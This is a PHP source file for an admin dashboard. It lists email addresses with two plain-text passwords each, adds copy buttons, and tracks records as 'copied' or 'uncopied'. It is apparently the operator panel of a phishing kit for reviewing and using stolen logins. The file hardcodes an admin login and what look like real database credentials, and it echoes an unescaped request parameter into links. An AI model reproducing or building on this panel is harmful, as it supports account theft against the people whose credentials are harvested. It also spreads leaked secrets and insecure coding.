<?php
session_start();

// Hardcoded credentials
$valid_username = "admin";
$valid_password = "password123";

// Check login
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = $_POST['username'];
    $password = $_POST['password'];

    if ($username === $valid_username && $password === $valid_password) {
        $_SESSION['logged_in'] = true;
    } else {
        header('Location: index.php');
        exit;
    }
}

// Ensure user is logged in
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
    header('Location: index.php');
    exit;
}

// Database connection
$pdo = new PDO("mysql:host=localhost;dbname=blawzmfo_jerido", "blawzmfo_jeri", "Ekemena2@");

// Handle filter
$filter = $_GET['filter'] ?? 'all'; // 'all', 'copied', 'uncopied'
$where = '';
if ($filter === 'copied') {
    $where = 'WHERE is_copied = 1';
} elseif ($filter === 'uncopied') {
    $where = 'WHERE is_copied = 0';
}

// Pagination
$limit = 10;
$page = $_GET['page'] ?? 1;
$offset = ($page - 1) * $limit;

// Fetch data
$stmt = $pdo->prepare("SELECT id, email, first_password AS password, second_password, is_copied FROM users $where LIMIT :limit OFFSET :offset");
$stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
$stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
$stmt->execute();
$users = $stmt->fetchAll(PDO::FETCH_ASSOC);

// Count total for pagination
$total_stmt = $pdo->query("SELECT COUNT(*) FROM users $where");
$total_records = $total_stmt->fetchColumn();
$total_pages = ceil($total_records / $limit);

// Success/Error messages
if (isset($_GET['success'])) {
    $success_message = "Credential marked as copied successfully.";
}

if (isset($_GET['error'])) {
    $error_message = htmlspecialchars($_GET['error']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Dashboard</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css" />
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        body {
            background: linear-gradient(135deg, #f5f7fa, #c3cfe2);
            margin: 0;
            padding: 20px;
        }

        .card-container {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
            gap: 20px;
            margin-top: 20px;
        }

        .card {
            background: #ffffff;
            border-radius: 15px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            padding: 20px;
            transition: transform 0.3s ease, box-shadow 0.3s ease;
        }

        .card:hover {
            transform: translateY(-10px);
            box-shadow: 0 8px 16px rgba(0, 0, 0, 0.3);
        }

        .card-header {
            font-size: 1.25rem;
            font-weight: bold;
            margin-bottom: 10px;
            color: #2c3e50;
        }

        .card-actions {
            margin-top: 15px;
            display: flex;
            justify-content: space-between;
        }

        .btn-copy {
            display: flex;
            align-items: center;
            color: #3498db;
            cursor: pointer;
            transition: color 0.3s ease;
        }

        .btn-copy:hover {
            color: #1d68a7;
        }

        .btn-success {
            background-color: #2ecc71;
            border-color: #27ae60;
        }

        .btn-success:hover {
            background-color: #27ae60;
            border-color: #219150;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1 class="text-3xl font-bold mb-4 text-center animate__animated animate__fadeInDown">Dashboard</h1>

        <?php if (!empty($success_message)): ?>
        <div class="alert alert-success animate__animated animate__fadeIn">
            <?= $success_message ?>
        </div>
        <?php endif; ?>

        <?php if (!empty($error_message)): ?>
        <div class="alert alert-danger animate__animated animate__fadeIn">
            <?= $error_message ?>
        </div>
        <?php endif; ?>

        <div class="filter-buttons text-center">
            <a href="?filter=all" class="btn btn-secondary mx-2">All</a>
            <a href="?filter=uncopied" class="btn btn-secondary mx-2">Uncopied</a>
            <a href="?filter=copied" class="btn btn-secondary mx-2">Copied</a>
        </div>

        <div class="card-container">
            <?php foreach ($users as $user): ?>
            <div class="card animate__animated animate__zoomIn">
                <div class="card-header">
                    <?= htmlspecialchars($user['email']) ?>
                    <button class="btn-copy" onclick="copyToClipboard('<?= htmlspecialchars($user['email']) ?>')">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-clipboard" viewBox="0 0 16 16">
                            <path d="M10 1.5v1a.5.5 0 0 1-.5.5h-3a.5.5 0 0 1-.5-.5v-1h-3A1.5 1.5 0 0 0 2 3v10a1.5 1.5 0 0 0 1.5 1.5h9A1.5 1.5 0 0 0 14 13V3a1.5 1.5 0 0 0-1.5-1.5h-3z"/>
                        </svg>
                        Copy
                    </button>
                </div>
                <div class="card-body">
                    <p><strong>Password:</strong> <?= htmlspecialchars($user['password']) ?></p>
                    <button class="btn-copy" onclick="copyToClipboard('<?= htmlspecialchars($user['password']) ?>')">Copy Password</button>
                    <p><strong>Second Password:</strong> <?= htmlspecialchars($user['second_password'] ?? 'N/A') ?></p>
                    <button class="btn-copy" onclick="copyToClipboard('<?= htmlspecialchars($user['second_password'] ?? '') ?>')">Copy Second Password</button>
                </div>
                <div class="card-actions">
                    <a href="copy.php?id=<?= $user['id'] ?>" class="btn btn-success">Mark as Copied</a>
                </div>
            </div>
            <?php endforeach; ?>
        </div>

        <!-- Pagination -->
        <div class="mt-4 text-center">
            <nav>
                <ul class="pagination justify-content-center">
                    <?php for ($i = 1; $i <= $total_pages; $i++): ?>
                    <li class="page-item <?= $i == $page ? 'active' : '' ?>">
                        <a class="page-link" href="?page=<?= $i ?>&filter=<?= $filter ?>"><?= $i ?></a>
                    </li>
                    <?php endfor; ?>
                </ul>
            </nav>
        </div>
    </div>

    <script>
        function copyToClipboard(text) {
            if (text) {
                navigator.clipboard.writeText(text).then(() => {
                    alert('Copied to clipboard!');
                }).catch(() => {
                    alert('Failed to copy to clipboard.');
                });
            } else {
                alert('Nothing to copy.');
            }
        }
    </script>
</body>
</html>
